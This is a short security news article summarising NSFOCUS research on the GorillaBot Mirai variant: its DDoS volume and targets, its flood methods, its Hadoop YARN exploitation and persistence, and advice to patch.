Cybersecurity researchers have discovered a new variant of the notorious Mirai botnet, dubbed Gorilla (aka GorillaBot), which has been responsible for over 300,000 attack commands in a short span between September 4 and September 27, 2024. According to NSFOCUS, the cybersecurity firm that identified this botnet, it has issued no less than 20,000 distributed denial-of-service (DDoS) commands per day on average, with a staggering attack density.
The GorillaBot has already impacted more than 100 countries, including China, the U.S., Canada, and Germany, targeting universities, government websites, telecom providers, banks, and the gaming and gambling sectors.
The malware uses a variety of DDoS methods to overwhelm its targets, including UDP flood, ACK BYPASS flood, Valve Source Engine (VSE) flood, SYN flood, and ACK flood. Its reliance on the connectionless UDP protocol allows for IP spoofing, enabling the botnet to generate massive amounts of malicious traffic to targeted systems.
NSFOCUS also revealed that GorillaBot supports multiple CPU architectures like ARM, MIPS, x86_64, and x86, making it adaptable to a wide range of devices. It connects to one of five predefined command-and-control (C2) servers to receive DDoS attack commands.
Interestingly, GorillaBot also exploits a security flaw in Apache Hadoop YARN RPC to enable remote code execution, a vulnerability that has been actively exploited since at least 2021. Once the botnet compromises a device, it ensures persistence by adding malicious files to system directories such as /etc/systemd/system/ and configuring them to run on system startup or user login.
The botnet is designed with encryption algorithms commonly used by the notorious Keksec group, demonstrating sophisticated counter-detection tactics. This level of evasion helps maintain long-term control over compromised IoT devices and cloud hosts, indicating a high level of awareness and adaptability within this emerging malware family.
Cybersecurity experts recommend vigilance and patching, particularly in environments where Apache Hadoop or vulnerable IoT devices are in use, to mitigate the risk of GorillaBot attacks.
© 2016 - 2025 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067